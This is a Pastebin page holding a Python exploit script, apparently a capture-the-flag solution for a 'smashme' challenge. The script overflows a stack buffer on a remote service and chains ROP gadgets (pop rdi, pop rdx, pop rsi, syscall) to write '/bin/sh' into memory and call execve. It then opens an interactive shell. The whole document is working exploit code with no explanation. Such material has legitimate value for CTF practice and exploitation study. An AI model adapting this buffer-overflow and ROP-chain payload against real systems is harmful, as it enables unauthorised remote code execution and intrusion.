Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from m1z0r3 import *
- HOST = "smashme_omgbabysfirst.quals.shallweplayaga.me"
- PORT = 57348
- prefix = "Smash me outside, how bout dAAAAAAAAAAA"
- offset = 33
- s,f = sock(HOST,PORT)
- addr_pop_rdi = 0x004014d6 # pop rdi;
- addr_pop_rdx = 0x00441e46 # pop rdx;
- addr_pop_rsi = 0x004015f7 # pop rsi;
- addr_syscall = 0x00466815 # syscall;
- addr_xor_rax = 0x0042564f # xor rax rax;
- addr_mov_rdi_rdx = 0x434a43 # mov [rdi] rdx;
- addr_lea_rax_f = 0x43a43e # lea rax [rdx+0x0F];
- addr_add_rax_3 = 0x465ce0 # add rax 0x003;
- addr_add_rax_2 = 0x465cc7 # add rax 0x02;
- """
- # rax = 59
- xor rax rax;
- lea rax [rdx+0x0F]; # rax = 51
- add rax 0x3;
- add rax 0x3;
- add rax 0x2;
- # rdx = 0
- pop rdx;
- 0
- # rsi = {rdi,rdx}
- pop rdi;
- bss_addr + 0x200;
- pop rdx;
- bss_addr
- mov [rdi] rdx;
- pop rsi;
- bss_addr + 0x200;
- # rdi = * "/bin/sh"
- pop rdi;
- bss_addr;
- pop rdx;
- "/bin/sh"
- mv [rdi] rdx;
- syscall;
- """
- bss_addr = 0x6cab60 + 0x100
- buf = prefix
- buf += "A" * offset
- # rax = 59
- buf += p64(addr_xor_rax)
- buf += p64(addr_lea_rax_f)
- buf += p64(addr_add_rax_3)
- buf += p64(addr_add_rax_3)
- buf += p64(addr_add_rax_2)
- # rsi = {rdi,NULL}
- buf += p64(addr_pop_rdi)
- buf += p64(bss_addr+0x100)
- buf += p64(addr_pop_rdx)
- buf += p64(bss_addr)
- buf += p64(addr_mov_rdi_rdx)
- buf += p64(addr_pop_rsi)
- buf += p64(bss_addr+0x100)
- # rdi = /bin/sh
- buf += p64(addr_pop_rdi)
- buf += p64(bss_addr)
- buf += p64(addr_pop_rdx)
- buf += "/bin/sh\x00"
- buf += p64(addr_mov_rdi_rdx)
- # rdx = 0
- buf += p64(addr_pop_rdx)
- buf += p64(0)
- # syscall
- buf += p64(addr_syscall)
- s.send(buf+"\n")
- shell(s)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
